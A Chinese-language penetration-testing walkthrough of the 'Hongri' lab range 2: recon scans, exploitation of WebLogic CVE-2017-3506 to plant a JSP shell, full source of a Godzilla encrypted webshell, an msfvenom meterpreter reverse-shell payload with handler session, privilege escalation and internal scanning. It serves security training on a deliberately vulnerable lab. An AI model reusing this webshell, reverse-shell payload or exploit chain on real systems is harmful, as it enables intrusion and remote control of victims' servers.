红日靶场-2

news2024/11/26 3:55:39

目录

前言

外网渗透

外网渗透打点

1、arp探测

2、nmap探测

3、nikto探测

4、gobuster目录探测

WebLogic 10.3.6.0

1、版本信息

2、WeblogicScan扫描

3、漏洞利用

4、哥斯拉连接

内网渗透

MSF上线

1、反弹连接

2、内网扫描

3、frpc内网穿透

4、ms17-010

5、get WEB

6、内网信息收集

7、域内信息收集

CVE-2020-1472漏洞利用

1、漏洞检测

2、漏洞利用

3、impacket-secretsdump

4、impacket-wmiexec

5、注册表操作

6、get DC

7、get PC


前言


靶场环境主要包括Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。

1.Bypass UAC
2.Windows系统NTLM获取
3.Access Token利用(MSSQL利用)
4.WMI利用
5.网页代理,二层代理,特殊协议代理
6.域内信息收集
7.域漏洞利用:SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用
8.域凭证收集
9.后门技术(黄金票据、白银票据、Sid History、MOF)

环境说明
内网网段:10.10.10.1/24
DMZ网段:192.168.16.1/24
测试机地址:192.168.16.1(Windows),192.168.16.11(Linux)
防火墙策略(策略设置过后,测试机只能访问192段地址,模拟公网访问):
deny all tcp ports:10.10.10.1
allow all tcp ports:10.10.10.0/24
配置信息
DC
IP:10.10.10.10 OS:Windows 2012(64)
应用:AD域
WEB
IP1:10.10.10.80IP2:192.168.16.80 OS:Windows 2008(64)
应用:Weblogic 10.3.6MSSQL 2008
PC
IP1:10.10.10.201 IP2:192.168.16.201 OS:Windows 7(32)


外网渗透

外网渗透打点

1、arp探测


┌──(root㉿ru)-[~/lianxi]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.16.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.16.1    00:50:56:c0:00:08       VMware, Inc.
192.168.16.2    00:50:56:e6:0b:60       VMware, Inc.
192.168.16.80   00:0c:29:da:7f:82       VMware, Inc.
192.168.16.201  00:0c:29:87:fc:42       VMware, Inc.
192.168.16.254  00:50:56:e4:76:c0       VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.339 seconds (109.45 hosts/sec). 5 responded


2、nmap探测

端口探测

┌──(root㉿ru)-[~/lianxi]
└─# cat ports.nmap
# Nmap 7.94 scan initiated Mon Nov 13 14:57:20 2023 as: nmap -p- --min-rate 10000 -oA ports 192.168.16.80
Nmap scan report for 192.168.16.80
Host is up (0.00056s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
3389/tcp  open  ms-wbt-server
7001/tcp  open  afs3-callback
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49160/tcp open  unknown
60966/tcp open  unknown
MAC Address: 00:0C:29:DA:7F:82 (VMware)

# Nmap done at Mon Nov 13 14:57:34 2023 -- 1 IP address (1 host up) scanned in 13.41 seconds

提取端口
┌──(root㉿ru)-[~/lianxi]
└─# cat ports.nmap| awk '{print($1)}'|awk -F "/" '{print($1)}'|head -n18|tail -n13
80
135
139
445
1433
3389
7001
49152
49153
49154
49155
49160
60966


信息探测

┌──(root㉿ru)-[~/lianxi]
└─# nmap -T4 -sV -sT -sC -p- 192.168.16.80 --min-rate 10000 -oA XX
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-13 15:12 CST
Nmap scan report for 192.168.16.80
Host is up (0.0035s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 7.5
|_http-title: Site doesn't have a title.
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  0                  Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
1433/tcp  open  ms-sql-s           Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ms-sql-ntlm-info:
|   192.168.16.80:1433:
|     Target_Name: DE1AY
|     NetBIOS_Domain_Name: DE1AY
|     NetBIOS_Computer_Name: WEB
|     DNS_Domain_Name: de1ay.com
|     DNS_Computer_Name: WEB.de1ay.com
|     DNS_Tree_Name: de1ay.com
|_    Product_Version: 6.1.7601
| ms-sql-info:
|   192.168.16.80:1433:
|     Version:
|       name: Microsoft SQL Server 2008 R2 SP2
|       number: 10.50.4000.00
|       Product: Microsoft SQL Server 2008 R2
|       Service pack level: SP2
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2023-11-13T07:14:53+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-11-13T06:37:57
|_Not valid after:  2053-11-13T06:37:57
3389/tcp  open  ssl/ms-wbt-server?
|_ssl-date: 2023-11-13T07:14:53+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=WEB.de1ay.com
| Not valid before: 2023-11-08T04:25:06
|_Not valid after:  2024-05-09T04:25:06
| rdp-ntlm-info:
|   Target_Name: DE1AY
|   NetBIOS_Domain_Name: DE1AY
|   NetBIOS_Computer_Name: WEB
|   DNS_Domain_Name: de1ay.com
|   DNS_Computer_Name: WEB.de1ay.com
|   DNS_Tree_Name: de1ay.com
|   Product_Version: 6.1.7601
|_  System_Time: 2023-11-13T07:14:13+00:00
7001/tcp  open  http               Oracle WebLogic Server (Servlet 2.5; JSP 2.1)
|_http-title: Error 404--Not Found
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49160/tcp open  msrpc              Microsoft Windows RPC
60966/tcp open  ms-sql-s           Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ms-sql-info:
|   192.168.16.80:60966:
|     Version:
|       name: Microsoft SQL Server 2008 R2 SP2
|       number: 10.50.4000.00
|       Product: Microsoft SQL Server 2008 R2
|       Service pack level: SP2
|       Post-SP patches applied: false
|_    TCP port: 60966
| ms-sql-ntlm-info:
|   192.168.16.80:60966:
|     Target_Name: DE1AY
|     NetBIOS_Domain_Name: DE1AY
|     NetBIOS_Computer_Name: WEB
|     DNS_Domain_Name: de1ay.com
|     DNS_Computer_Name: WEB.de1ay.com
|     DNS_Tree_Name: de1ay.com
|_    Product_Version: 6.1.7601
|_ssl-date: 2023-11-13T07:14:53+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-11-13T06:37:57
|_Not valid after:  2053-11-13T06:37:57
MAC Address: 00:0C:29:DA:7F:82 (VMware)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -53m20s, deviation: 2h39m58s, median: -1s
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2023-11-13T07:14:15
|_  start_date: 2023-11-13T06:38:23
| smb-os-discovery:
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: WEB
|   NetBIOS computer name: WEB\x00
|   Domain name: de1ay.com
|   Forest name: de1ay.com
|   FQDN: WEB.de1ay.com
|_  System time: 2023-11-13T15:14:16+08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.21 seconds


漏洞探测

┌──(root㉿ru)-[~/lianxi]
└─# nmap --script=vuln 192.168.16.80 --min-rate 10000 -oA vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-13 15:18 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.16.80
Host is up (0.00055s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
| ssl-poodle:
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://www.securityfocus.com/bid/70574
|_tls-ticketbleed: ERROR: Script execution failed (use -d to debug)
3389/tcp  open  ms-wbt-server
7001/tcp  open  afs3-callback
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49160/tcp open  unknown
MAC Address: 00:0C:29:DA:7F:82 (VMware)

Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 167.35 seconds


3、nikto探测

┌──(root㉿ru)-[~/lianxi]
└─# nikto -h 192.168.16.80 nikto.txt
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.16.80
+ Target Hostname:    192.168.16.80
+ Target Port:        80
+ Start Time:         2023-11-13 15:25:57 (GMT8)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ /: Retrieved x-powered-by header: ASP.NET.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /SBmZsb9A.ashx: Retrieved x-aspnet-version header: 2.0.50727.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ 8102 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2023-11-13 15:26:14 (GMT8) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


4、gobuster目录探测

80端口啥也没有

7001端口
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.16.80:7001/ -w directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.16.80:7001/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/console              (Status: 302) [Size: 263] [--> http://192.168.16.80:7001/console/]
/uddi 


WebLogic 10.3.6.0


1、版本信息


访问http://192.168.16.80:7001/console 页面,可以在主页面中看到weblogic的版本

2、WeblogicScan扫描

weblogicScan是一款专门扫描weblogic漏洞的工具,可以直接对目标靶机存在weblogic漏洞进行一键探测。

┌──(root㉿ru)-[~/tools/WeblogicScan-master]
└─# python WeblogicScan.py -u 192.168.16.80 -p 7001

__        __   _     _             _        ____
\ \      / /__| |__ | | ___   __ _(_) ___  / ___|  ___ __ _ _ __
 \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \
  \ V  V /  __/ |_) | | (_) | (_| | | (__   ___) | (_| (_| | | | |
   \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_|
                             |___/
                             By Tide_RabbitMask | V 1.5

Welcome To WeblogicScan !!!
Whoami:https://github.com/rabbitmask
[*] =========Task Start=========
[+] [192.168.16.80:7001] Weblogic Version Is 10.3.6.0
[+] [192.168.16.80:7001] Weblogic console address is exposed! The path is: http://192.168.16.80:7001/console/login/LoginForm.jsp
[+] [192.168.16.80:7001] Weblogic UDDI module is exposed! The path is: http://192.168.16.80:7001/uddiexplorer/
[-] [192.168.16.80:7001] weblogic not detected CVE-2016-0638
[-] [192.168.16.80:7001] weblogic not detected CVE-2016-3510
[-] [192.168.16.80:7001] weblogic not detected CVE-2017-10271
[-] [192.168.16.80:7001] weblogic not detected CVE-2017-3248
[+] [192.168.16.80:7001] weblogic has a JAVA deserialization vulnerability:CVE-2017-3506
[-] [192.168.16.80:7001] weblogic not detected CVE-2018-2628
[-] [192.168.16.80:7001] weblogic not detected CVE-2018-2893
[-] [192.168.16.80:7001] weblogic not detected CVE-2018-2894
[+] [192.168.16.80:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2725
[-] [192.168.16.80:7001] weblogic not detected CVE-2019-2890
[*] =========Task E n d=========


3、漏洞利用

经过探测,目标主机存在两个cve漏洞。我们利用msf进行渗透,我们先利用CVE-2017-3506这个漏洞,我们在github上搜索这个exp,进行检测。

┌──(root㉿ru)-[~/lianxi/CVE-2017-3506]
└─# java -jar WebLogic-XMLDecoder.jar -u http://192.168.16.80:7001
+----------------+------------------------------+-----------------------------------------------------------------+
|      Time      |             Status           |                                Host                             |
+----------------+------------------------------+-----------------------------------------------------------------+
|    12:40:25    |      [+] 漏洞存在            | http://192.168.16.80:7001/wls-wsat/test.logs
+----------------+------------------------------+-----------------------------------------------------------------+

┌──(root㉿ru)-[~/lianxi/CVE-2017-3506]
└─# java -jar WebLogic-XMLDecoder.jar

                        WebLogic wls-wsat组件反序列化漏洞利用

[*]          漏洞编号  CVE-2017-3506 & CVE-2017-10271
[*]          漏洞详情  https://www.secfree.com/article-635.html
[*]          作者邮箱  Bearcat@secfree.com

[*] 使用方法:
[*]          单个检测  -u http://Host:Port
[*]          批量检测  -f url.txt
[*]          上传木马  -s http://Host:Port /wls-wsat/CoordinatorPortType11 shell.jsp


[*] wls-wsat组件路径:

                        /wls-wsat/CoordinatorPortType
                        /wls-wsat/CoordinatorPortType11
                        /wls-wsat/ParticipantPortType
                        /wls-wsat/ParticipantPortType11
                        /wls-wsat/RegistrationPortTypeRPC
                        /wls-wsat/RegistrationPortTypeRPC11
                        /wls-wsat/RegistrationRequesterPortType
                        /wls-wsat/RegistrationRequesterPortType11


┌──(root㉿ru)-[~/lianxi/CVE-2017-3506]
└─# java -jar WebLogic-XMLDecoder.jar -s http://192.168.16.80:7001 /wls-wsat/CoordinatorPortType11 shell.jsp
[+] Success
[+] http://192.168.16.80:7001/wls-wsat/shell.jsp?password=secfree&command=whoami


4、哥斯拉连接

在此之前,我们先设置好代理。我们要在proxychains的配置文件里改一下代理设置。

┌──(root㉿ru)-[~]
└─# cat /etc/proxychains4.conf|tail -n5
# meanwile
# defaults set to "tor"
#socks5         127.0.0.1 6005
#socks4 192.168.16.80 3232
http 127.0.0.1 8080


然后我们再使用proxychains进行上传。我们先打开bp,然后把代理设置为和上面的代理一样。

┌──(root㉿ru)-[~/lianxi/CVE-2017-3506]
└─# proxychains java -jar WebLogic-XMLDecoder.jar -s http://192.168.16.80:7001/ /wls-wsat/CoordinatorPortType11 shell.jsp
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[proxychains] Strict chain  ...  127.0.0.1:8080  ...  192.168.16.80:7001  ...  OK
[+] Success
[+] http://192.168.16.80:7001//wls-wsat/shell.jsp?password=secfree&command=whoami



我们再使用哥斯拉生成一个jsp木马,一会我们进行连接使用。

哥斯拉poc

PS C:\Users\86176\Desktop> cat shell.jsp
<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><% try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(pageContext.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters", new String(data));Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(pageContext);response.getWriter().write(md5.substring(0,16));response.getWriter().write(base64Encode(x(base64Decode(f.toString()), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}%>
PS C:\Users\86176\Desktop>



上传到这个里面,这样我们就成功了。我们访问并连接。




然后,我们要用msf生成一个木马。用来反弹连接的。只需要把木马上传到哥斯拉里,运行即可。

内网渗透

MSF上线

1、反弹连接

msf6 > msfvenom -p windows/x64/meterpreter/reverse_tcp lhosts=192.168.16.80 lport=1111 -f exe -o 1.exe
[*] exec: msfvenom -p windows/x64/meterpreter/reverse_tcp lhosts=192.168.16.80 lport=1111 -f exe -o 1.exe

Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: 1.exe
msf6 > ls
[*] exec: ls

!             frpc.ini     ports.xml   vuln.xml      zerologon-master.zip
1.exe          fscan.exe    shell.exe   weblogic_hr2
CVE-2017-3506  ports.gnmap  shell.ps1   XX.gnmap
exploit.py     ports.nmap   vuln.gnmap  XX.nmap
frpc.exe       ports.txt    vuln.nmap   XX.xml


使用监听模块

msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, p
                                        rocess, none)
   LHOST     192.168.16.128   yes       The listen address (an interface may be spec
                                        ified)
   LPORT     1111             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) >


msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.16.128:1111
[*] Sending stage (200774 bytes) to 192.168.16.80
[*] Meterpreter session 1 opened (192.168.16.128:1111 -> 192.168.16.80:64679) at 2023-11-15 14:55:07 +0800

meterpreter >


使用getuid发现他是管理员权限,我们使用 getsystem 命令进行简单提权。


meterpreter > getuid
Server username: DE1AY\administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).


2、内网扫描

我们可以上传一个fscan.exe文件,进行内网扫描

meterpreter > upload fscan.exe C:/fscan.exe
[*] Uploading  : /root/lianxi/fscan.exe -> C:/fscan.exe
[*] Uploaded 8.00 MiB of 25.62 MiB (31.22%): /root/lianxi/fscan.exe -> C:/fscan.exe
[*] Uploaded 16.00 MiB of 25.62 MiB (62.45%): /root/lianxi/fscan.exe -> C:/fscan.exe
[*] Uploaded 24.00 MiB of 25.62 MiB (93.67%): /root/lianxi/fscan.exe -> C:/fscan.exe
[*] Uploaded 25.62 MiB of 25.62 MiB (100.0%): /root/lianxi/fscan.exe -> C:/fscan.exe
[*] Completed  : /root/lianxi/fscan.exe -> C:/fscan.exe


meterpreter > cd C:/
meterpreter > ls
Listing: C:\
============

Mode             Size      Type  Last modified             Name
----             ----      ----  -------------             ----
040777/rwxrwxrw  4096      dir   2023-11-09 13:33:32 +080  $Recycle.Bin
x                                0
040555/r-xr-xr-  4096      dir   2019-10-08 11:11:40 +080  360SANDBOX
x                                0
040777/rwxrwxrw  0         dir   2019-10-20 16:44:56 +080  360Safe
x                                0
100444/r--r--r-  8192      fil   2019-09-08 18:54:26 +080  BOOTSECT.BAK
-                                0
040777/rwxrwxrw  4096      dir   2019-09-08 18:54:25 +080  Boot
x                                0
040777/rwxrwxrw  0         dir   2009-07-14 13:06:44 +080  Documents and Settings
x                                0
040777/rwxrwxrw  0         dir   2019-10-20 14:57:36 +080  Oracle
x                                0
040777/rwxrwxrw  0         dir   2009-07-14 11:20:08 +080  PerfLogs
x                                0
040555/r-xr-xr-  4096      dir   2019-10-20 16:30:40 +080  Program Files
x                                0
040555/r-xr-xr-  4096      dir   2019-10-20 16:30:40 +080  Program Files (x86)
x                                0
040777/rwxrwxrw  4096      dir   2023-11-09 12:42:28 +080  ProgramData
x                                0
040777/rwxrwxrw  0         dir   2019-09-08 19:01:04 +080  Recovery
x                                0
040777/rwxrwxrw  4096      dir   2019-09-08 18:57:24 +080  System Volume Information
x                                0
040555/r-xr-xr-  4096      dir   2019-10-20 16:41:02 +080  Users
x                                0
040777/rwxrwxrw  16384     dir   2023-11-14 17:29:02 +080  Windows
x                                0
040777/rwxrwxrw  0         dir   2019-10-20 14:57:54 +080  bea
x                                0
100444/r--r--r-  383786    fil   2010-11-21 11:24:02 +080  bootmgr
-                                0
100777/rwxrwxrw  26865664  fil   2023-11-15 15:26:41 +080  fscan.exe
x                                0
040777/rwxrwxrw  0         dir   2019-09-09 10:42:40 +080  inetpub
x                                0
000000/--------  0         fif   1970-01-01 08:00:00 +080  pagefile.sys

meterpreter > shell
Process 868 created.
Channel 2 created.
Microsoft Windows [▒汾 6.1.7601]
▒▒Ȩ▒▒▒▒ (c) 2009 Microsoft Corporation▒▒▒▒▒▒▒▒▒▒Ȩ▒▒

C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001

C:\Windows\system32>ipconfig /all
ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : WEB
   Primary Dns Suffix  . . . . . . . : de1ay.com
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : de1ay.com

Ethernet adapter ▒▒▒▒▒▒▒ 2:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2
   Physical Address. . . . . . . . . : 00-0C-29-DA-7F-8C
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::903c:bc23:7fc5:c94e%13(Preferred)
   IPv4 Address. . . . . . . . . . . : 10.10.10.80(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.1
   DHCPv6 IAID . . . . . . . . . . . : 301993001
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-06-97-6A-00-0C-29-68-D3-5F
   DNS Servers . . . . . . . . . . . : 10.10.10.10
   NetBIOS over Tcpip. . . . . . . . : Enabled

Ethernet adapter ▒▒▒▒▒▒▒:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-DA-7F-82
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::3d9b:497f:88e7:8c87%11(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.16.80(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.16.1
   DHCPv6 IAID . . . . . . . . . . . : 234884137
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-06-97-6A-00-0C-29-68-D3-5F
   DNS Servers . . . . . . . . . . . : 10.10.10.10
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{AD80CD23-D97F-4814-A715-9248D845EA0F}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{D7E14072-49B9-45D3-BA8C-7955E6146CC2}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes


这台主机名字是WEB,有两个ip,外网是:192.168.16.80 内网ip:10.10.10.80 说明内网的网段是10
我们对内网ip进行扫描。

C:\Windows\system32>cd c:/
cd c:/

c:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 36C6-96D5

 Directory of c:\

2019/10/20  16:44    <DIR>          360Safe
2019/10/20  14:57    <DIR>          bea
2023/11/15  15:26        26,865,664 fscan.exe
2019/09/09  10:42    <DIR>          inetpub
2019/10/20  14:57    <DIR>          Oracle
2009/07/14  11:20    <DIR>          PerfLogs
2019/10/20  16:30    <DIR>          Program Files
2019/10/20  16:30    <DIR>          Program Files (x86)
2019/10/20  16:41    <DIR>          Users
2023/11/14  17:29    <DIR>          Windows
               1 File(s)     26,865,664 bytes
               9 Dir(s)  23,947,055,104 bytes free

c:\>.\fscan.exe -h 10.10.10.80/24
.\fscan.exe -h 10.10.10.80/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.1-光头张三加强版

<-------------- 加入了很多地方的POC,目前POC数436 -------------->
start infoscan
(icmp) Target 10.10.10.10     is alive
(icmp) Target 10.10.10.80     is alive
[*] Icmp alive hosts len is: 2
10.10.10.80:139 open
10.10.10.10:139 open
10.10.10.10:88 open
10.10.10.80:7001 open
10.10.10.80:1433 open
10.10.10.80:445 open
10.10.10.80:135 open
10.10.10.10:445 open
10.10.10.10:135 open
10.10.10.80:80 open
[*] alive ports len is: 10
start vulscan
[+] 10.10.10.80 MS17-010        (Windows Server 2008 R2 Standard 7601 Service Pack 1)
[*] 10.10.10.80          DE1AY\WEB               Windows Server 2008 R2 Standard 7601 Service Pack 1
[+] NetInfo:
[*]10.10.10.10
   [->]DC
   [->]10.10.10.10
[+] 10.10.10.10 MS17-010        (Windows Server 2012 R2 Standard 9600)
[*] 10.10.10.10    [+]DC DE1AY\DC                Windows Server 2012 R2 Standard 9600
[*] WebTitle: http://10.10.10.80        code:200 len:0      title:None
[*] WebTitle: http://10.10.10.80:7001   code:404 len:1164   title:Error 404--Not Found
[+] InfoScan:http://10.10.10.80:7001   [weblogic]
已完成 10/10
